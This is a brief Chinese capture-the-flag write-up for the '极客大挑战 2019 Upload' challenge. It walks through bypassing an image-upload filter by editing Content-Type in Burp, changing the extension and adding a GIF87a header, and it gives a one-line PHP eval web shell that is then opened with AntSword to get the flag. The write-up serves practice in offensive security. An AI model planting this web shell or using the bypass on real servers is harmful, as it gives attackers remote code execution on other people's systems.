[极客大挑战 2019]Upload 1
打开靶机可以看到让我们上传一个图片,随便上传一个php文件

然后我们用burp来抓包试一试
根据提示,更改content-type


又提示我们php的后置格式被过滤了,更改为phh%00

<?又被过滤了,换一句代码
<script language="pHp">eval($_REQUEST['1']);</script>

到这的时候,我也不知道该怎么办了,就去看了下大佬的博客,发现可以加一个文件头
GIF87a<script language="pHp">eval($_REQUEST['1']);</script>

文件上传成功后,我们使用蚁剑连接我们上传的webshell,找到flag


浙公网安备 33010602011771号